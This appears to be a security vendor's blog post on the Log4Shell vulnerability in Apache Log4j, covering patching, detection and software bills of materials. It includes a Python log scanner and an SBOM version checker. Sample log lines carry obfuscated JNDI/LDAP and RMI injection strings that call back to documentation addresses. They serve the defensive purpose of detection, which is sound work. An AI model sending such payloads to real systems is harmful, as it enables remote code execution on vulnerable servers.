If cybersecurity specialists thought they could ease quietly into the holiday season, they were sadly mistaken.
Since Saturday, most of them have been working overtime to assess the impact of the Log4j vulnerability (CVE-2021-44228, widely known as Log4Shell), which is widely considered to be one of the most serious vulnerabilities disclosed in at least a decade.
This high-profile vulnerability carries the top CVSS score of 10.0. Log4j is an open-source, Java-based logging library developed by the Apache Software Foundation and used by applications to write log messages. Affected versions of Log4j 2 inspect the text of every message they log for lookup expressions of the form ${jndi:ldap://host/path} and resolve them, which means an attacker who can get a string of that shape into any field that ends up in a log (a User-Agent header, a username, a chat message) can make the server fetch and run attacker-supplied code from a remote server. No authentication is needed, and in many cases a single HTTP request is enough.
Log4j is embedded in an enormous number of Java applications and services, both to monitor their performance and to support security auditing, so the scale of the threat is hard to quantify.
But a vast number of vendor products are affected. Everything from internet routers to online banking services is built on Java, and this logging library may be embedded in any of them, sometimes several dependencies deep and without the operator ever having chosen it.
When Microsoft discovers a zero-day vulnerability in one of its products, its security team scrambles to develop a patch and pushes it out to users across the globe through a single update channel. Because Microsoft controls the affected product, the hole is closed as soon as users install the update.
In this case, it's more complicated. Apache has released fixed versions of Log4j, and many vendors who bundle it have issued patches of their own, but applying the fix across such a wide selection of affected applications will take months, or even years, because each application has to be rebuilt with the new library or updated by its vendor. On Tuesday a second vulnerability (CVE-2021-45046) was found that the first patch, version 2.15.0, did not fully address; the fix is to move to 2.16.0 (or 2.12.2 on Java 7). Where upgrading is not immediately possible, Apache's guidance is to remove the JndiLookup class from the log4j-core jar; the log4j2.formatMsgNoLookups setting recommended at first turned out not to cover every case.
Many Java apps were developed 10 to 15 years ago and have been ticking along in the background. Just identifying which of them include an affected version of Log4j will be a major undertaking for many organizations: the library is often pulled in indirectly or bundled inside another jar, so a search of the declared dependencies is not enough, and the affected range (Log4j 2 from 2.0-beta9 up to and including 2.15.0; the older 1.x line does not contain this lookup feature) has to be checked version by version. Due to their bespoke nature, some of these apps will have to be rebuilt to some extent, requiring a process of development and testing just as people are thinking about their holiday break.
While that task gets underway, network security professionals all over the world will be fixated on their systems. The first thing to look for is the exploit attempt itself: the ${jndi: string, and its many obfuscated variants, in web server logs, request headers and any other field an application logs. The second is outbound connections from application servers to unfamiliar LDAP, RMI or DNS servers, which is how a successful exploit fetches its payload. Then comes abnormal activity, such as account creation, lateral movement and privilege escalation, that suggests someone has moved beyond the affected web app. Some organizations have simply shut down the servers hosting web apps with Log4j to be on the safe side while they audit their systems.
This vulnerability has really highlighted the importance of generating a software bill of materials (SBOM), which lists every component of a piece of software, including indirect dependencies, for future business resilience. With one in hand, an organization can answer "where do we run log4j-core, and which version?" in minutes rather than weeks, and quickly decide which systems to isolate in an event like this.
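As an added illustration of the log review described above (example code written for this post, not a tool from Apache or from any vendor), the script below scans access-log lines for Log4Shell probes. Real probes rarely arrive as a plain ${jndi:...}; attackers wrap pieces of it in Log4j's own lookups, such as ${lower:j} or the default-value form ${::-j}, so the script peels those layers off before matching. The log lines are constructed samples using documentation IP addresses, and the obfuscation patterns handled are the common ones, not an exhaustive list.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Obfuscation layers seen in real Log4Shell probes: case-changing lookups
# (${lower:j}) and the "default value" trick (${anything:-j}), where an
# unknown or empty key resolves to the text after ":-". Peeling them off
# turns "${${lower:j}ndi:..." back into "${jndi:..." before matching.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)
_ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")


def normalize(text: str, max_rounds: int = 20) -> str:
    """Resolve nested lower/upper/default lookups from the inside out until
    the string stops changing (bounded, so a crafted line cannot spin us)."""
    for _ in range(max_rounds):
        step = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        step = _DEFAULT.sub(lambda m: m.group(1), step)
        if step == text:
            break
        text = step
    return text


@dataclass
class Finding:
    line: str
    verdict: str            # "jndi": exploit attempt; "lookup": lookup syntax in untrusted input
    scheme: Optional[str]   # ldap, ldaps, rmi, dns, ... for "jndi" findings
    normalized: str         # the de-obfuscated line, useful for the analyst


def analyze_line(line: str) -> Optional[Finding]:
    if "${" not in line:
        return None                       # cheap pre-filter: no lookup syntax at all
    norm = normalize(line)
    m = _JNDI.search(norm)
    if m:
        return Finding(line, "jndi", m.group(1).lower(), norm)
    if _ANY_LOOKUP.search(norm):
        # Not a JNDI string after normalisation, but lookup syntax does not belong
        # in a User-Agent or query string: worth a look, and a sign of a new variant.
        return Finding(line, "lookup", None, norm)
    return None


def scan(lines: List[str]) -> List[Finding]:
    return [f for f in map(analyze_line, lines) if f is not None]


# Constructed sample access-log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:14:03:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.9:1099/x}"',
    '192.0.2.4 - - [10/Dec/2021:14:03:10 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.verdict:6} scheme={f.scheme or '-':5} {f.normalized}")
```

Two points on the design. A "jndi" finding tells you who probed you and which callback scheme they used, but not whether the probe worked; that answer comes from the outbound-connection check, so correlate the callback host and port in the finding against egress logs from the application server. The looser "lookup" verdict exists because the normaliser is a heuristic: when a new obfuscation appears that it cannot unwrap, the line still surfaces for a human to look at rather than being silently dropped.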
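To show what the identification task and an SBOM buy you in practice (an added example for this post, not code from Apache or from any SBOM tool), the script below walks a CycloneDX JSON bill of materials, picks out every log4j-core component and decides whether its version falls in the affected range described above. The version table encodes the state of the advisory as this post describes it (2.0-beta9 as the first affected release, 2.16.0 and the 2.12.2 Java 7 backport as the fixes) and should be re-checked against Apache's advisory. The SBOM fragment is constructed for illustration; the field names (components, group, name, version, purl) are the real CycloneDX ones.

```python
import json
import re
from typing import Dict, List, Tuple

# Version tuple: (major, minor, patch, pre-release rank, pre-release number).
# Pre-release rank orders beta (0) < rc (1) < final release (2), so "2.0-beta9" < "2.0-rc1" < "2.0".
_VER = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$", re.IGNORECASE)
_PRE_RANK = {"beta": 0, "rc": 1}


def parse_version(v: str) -> Tuple[int, int, int, int, int]:
    m = _VER.match(v.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version string: {v!r}")
    major, minor, patch, pre, pre_n = m.groups()
    rank = _PRE_RANK[pre.lower()] if pre else 2
    return (int(major), int(minor), int(patch or 0), rank, int(pre_n or 0))


# Affected range as described in the text: the JNDI lookup appeared in 2.0-beta9; 2.15.0 is
# still affected (CVE-2021-45046); 2.16.0 is the fix, with 2.12.2 as the Java 7 backport.
# The 1.x line never had this lookup feature. Re-check this table against Apache's advisory.
FIRST_AFFECTED = parse_version("2.0-beta9")
FIXED_MAINLINE = parse_version("2.16.0")
FIXED_JAVA7_BRANCH = parse_version("2.12.2")


def is_affected(version: str) -> bool:
    v = parse_version(version)
    if v[0] != 2:
        return False
    if v[:2] == (2, 12) and v >= FIXED_JAVA7_BRANCH:
        return False
    return FIRST_AFFECTED <= v < FIXED_MAINLINE


def log4j_findings(sbom: Dict) -> List[Dict]:
    """Walk a CycloneDX JSON SBOM and report every log4j-core component.
    Only log4j-core carries the vulnerable lookup; log4j-api alone is not affected."""
    findings = []
    for comp in sbom.get("components", []):
        if comp.get("group") == "org.apache.logging.log4j" and comp.get("name") == "log4j-core":
            findings.append({
                "purl": comp.get("purl"),
                "version": comp["version"],
                "affected": is_affected(comp["version"]),
            })
    return findings


# Constructed CycloneDX 1.4 fragment for illustration; not a real product's SBOM.
SAMPLE_SBOM = json.loads("""
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-api",
     "version": "2.14.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1"},
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
     "version": "2.14.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
    {"type": "library", "group": "com.fasterxml.jackson.core", "name": "jackson-databind",
     "version": "2.12.3", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.12.3"}
  ]
}
""")

if __name__ == "__main__":
    for f in log4j_findings(SAMPLE_SBOM):
        print(("AFFECTED  " if f["affected"] else "ok        ") + f["purl"])
```

The caveat is that an SBOM is only as good as its completeness: if a vendor shaded Log4j into a fat jar under another name, or the SBOM was generated from declared rather than resolved dependencies, the component will not appear and the scan will say nothing. For anything without a trustworthy SBOM, the fallback is to open the deployed jars themselves and look for the JndiLookup class.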
The weeks ahead will be a stressful time for those organizations that are affected. Security researchers are already seeing attackers attempting to exploit the vulnerability.
We could well see an escalation in ransomware attacks as the vulnerability is used to plant malware on servers. State-sponsored groups may already be using it to extract sensitive information as well.
The bottom line is that there's no room for complacency here. This is a critical vulnerability, and action can't be deferred. An experienced security expert can help identify, contain or protect against the threat. Accelerance's on-demand cybersecurity professionals are ready to assist our clients in assessing their position in relation to Log4j and, where necessary, helping them take mitigating actions.
As trusted advisors, they provide recommendations to modify or rebuild web apps where necessary. This vulnerability affects organizations big and small, all over the world. By being vigilant and helping our partners and customers, we can make sure the potential for damage is minimized.